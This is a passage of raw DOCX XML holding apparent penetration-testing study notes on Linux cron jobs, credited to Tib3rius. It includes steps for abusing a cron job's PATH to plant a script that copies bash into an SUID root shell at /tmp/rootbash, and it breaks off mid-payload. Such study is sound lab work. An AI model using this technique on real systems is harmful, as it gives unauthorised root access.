        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This gives the binary permission to change its effective user ID (e.g. to 0 for root).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023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3CE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tsxws92cycql" w:id="316"/>
      <w:bookmarkEnd w:id="316"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Jobs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To look at cron jobs, either look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or look at the cron tabs output of LinPeas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Definitely manually enumerate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/cron.d </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for custom cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y4w4k8qm2cw9" w:id="317"/>
      <w:bookmarkEnd w:id="317"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Jobs info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Cron Jobs Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Tabs </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="793"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron table files (crontabs) store the configuration for cron jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="793"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User crontabs </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">are usually located in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/spool/cron/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/spool/cron/crontabs/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="793"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The system-wide crontab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is located at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/crontab</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3DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1256"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Definitely manually enumerate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/cron.d </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for custom cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m1n8dqqfbhr7" w:id="318"/>
      <w:bookmarkEnd w:id="318"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing PATH variable for unspecified absolute paths to executables ran by cron </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Cron Jobs Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron jobs may sometimes run an executable like "overwrite.sh".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5386388" cy="1070372"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="486" name="image200.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image200.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId753"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5386388" cy="1070372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BUT, they forgot to specify the absolute path to the executable. So we can find the PATH variable SPECIFIC to cron jobs, and then see if we can add our own malicious file with the same name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="749300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="483" name="image390.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image390.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId418"/>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23E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Linux Smart Enumeration and we can see the PATH variable specific to /etc/crontab. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="734"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it says that we can write to some of the file paths in the cron job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View the contents of the system-wide crontab:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/ctrontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5386388" cy="1070372"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="217" name="image200.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image200.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId753"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5386388" cy="1070372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Locate the overwrite.sh file on the server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">locate overwrite.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/bin/overwrite.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the PATH variable in /etc/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/ctrontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find it, try adding a file with the same name to the first place PATH looks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="749300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="397" name="image390.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image390.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId418"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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23F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So here, it would be</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in the new file (copy /bin/bash but make it SUID):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F6">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /bin/bash /tmp/rootbash</w:t>
      </w:r>
    </w:p>
